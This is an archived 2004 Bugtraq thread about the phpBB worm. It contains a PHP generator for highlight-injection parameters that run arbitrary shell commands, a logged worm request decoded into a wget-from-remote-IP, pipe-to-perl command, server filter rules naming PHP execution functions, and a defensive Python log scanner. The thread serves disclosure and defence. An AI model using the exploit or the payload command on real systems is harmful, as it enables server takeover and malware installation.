lists.openwall.net - Open Source and information security mailing list archives
Date: Wed, 22 Dec 2004 23:34:12 -0000
From: "William Geoghegan" <w.geoghegan@...tekcs.co.uk>
To: "Sebastian Wiesinger" <bofh@...e-world.de>, <bugtraq@...urityfocus.com>
Subject: Re: phpBB Worm

A script to check if your phpBB is vulnerable. Anything below 2.0.11
_probably_ is, but in case you're not sure, use this script. The script
generates the request parameters; all you need to do is copy the result
onto www.thesite.com/viewtopic.php

<?php
$rush = 'ls -al';                               // do what
$highlight = 'passthru($HTTP_GET_VARS[rush])';  // don't touch

// Topic id, then the command, one percent-encoded byte at a time.
print "?t=%37&rush=";
for ($i = 0; $i < strlen($rush); ++$i) {
    print '%' . bin2hex(substr($rush, $i, 1));
}
// %2527 is a double-encoded single quote wrapped around the encoded PHP.
print "&highlight=%2527.";
for ($i = 0; $i < strlen($highlight); ++$i) {
    print '%' . bin2hex(substr($highlight, $i, 1));
}
print ".%2527";
?>

Cheers.

William Geoghegan
GEOTEK Computer Services - www.geotekcs.co.uk

----- Original Message -----
From: "Sebastian Wiesinger" <bofh@...e-world.de>
To: <bugtraq@...urityfocus.com>
Sent: Wednesday, December 22, 2004 11:22 AM
Subject: Re: phpBB Worm

>* Raymond Dijkxhoorn <raymond@...location.net> [2004-12-22 00:06]:
>> If you cannot fix it (virtual servers) fast for all your clients you could
>> also try with something like this:
>>
>> RewriteEngine On
>> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>> RewriteRule ^.*$ - [F]
>>
>> We had some vhosts where this worked just fine. On our systems we didn't
>> see any valid request with echr and esystem, just be gentle with it, it
>> works for me, it could work for you ;)
>
> If you use mod_security, this may help, too:
>
> SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
>
> I had another exploit attempt, with this payload:
>
> 66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"
>
> Which decodes to:
>
> rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_
> highlight='.passthru($HTTP_GET_VARS[rush]).'
>
> Regards,
>
> Sebastian
>
> --
> GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
> Resist the beginnings: http://odem.org/informationsfreiheit/
> Thunder rolled. ... It rolled a six.
> --Terry Pratchett, Guards! Guards!
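A defender-side log check built from the filters and the logged request in the quoted reply, added here as an example that is not part of the original thread: it parses Apache access-log lines, fully percent-decodes the query string (the payload double-encodes the quote as %2527, and a match on the raw query string, as the RewriteCond above does, cannot see percent-encoded text at all), and flags viewtopic.php requests whose highlight parameter breaks out of phpBB's quoted string and calls one of the functions listed in the mod_security rule. The log lines are constructed; the first reproduces the quoted attempt with a shortened rush command.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines: a shortened form of the exploit
# attempt quoted in the thread (same highlight payload), then a normal search hit.
SAMPLE_LOG = """\
66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"
10.0.0.5 - - [22/Dec/2004:10:07:02 +0100] "GET /forum/viewtopic.php?t=7&highlight=bugtraq+worm HTTP/1.1" 200 9876 "-" "Mozilla/4.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*"')
# Same function list as the SecFilterSelective rule in Sebastian's reply.
PHP_CALL_RE = re.compile(
    r'(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\(', re.I)
# Which GET variable the injected PHP reads its shell command from.
GET_VAR_RE = re.compile(r'\$(?:HTTP_GET_VARS|_GET)\[[\'"]?(\w+)[\'"]?\]')

def decode_twice(value):
    # The payload double-encodes the quote (%2527 -> %27 -> '), so one decoding
    # pass still hides it; decode twice before matching.
    return unquote(unquote(value))

def split_query(query):
    # Raw query string -> {name: fully decoded value}.
    params = {}
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        params[unquote(name)] = decode_twice(value)
    return params

def inspect_line(line):
    # Return a finding dict if the line is a phpBB highlight injection, else None.
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    if not path.endswith('/viewtopic.php') or not query:
        return None
    params = split_query(query)
    highlight = params.get('highlight', '')
    # The injection closes phpBB's single-quoted string ('.<php>.') and calls a
    # command-execution function; ordinary search terms contain neither.
    if "'." not in highlight or not PHP_CALL_RE.search(highlight):
        return None
    var = GET_VAR_RE.search(highlight)
    return {'ip': m.group('ip'), 'timestamp': m.group('ts'), 'highlight': highlight,
            'command': params.get(var.group(1)) if var else None}

def scan_log(text):
    # Run inspect_line over every access-log line and collect the findings.
    return [f for f in map(inspect_line, text.splitlines()) if f]
```

Feed it a real access log with scan_log(open(path).read()); the 'command' field of each finding is the decoded shell command the request tried to run, which is what you want for triage.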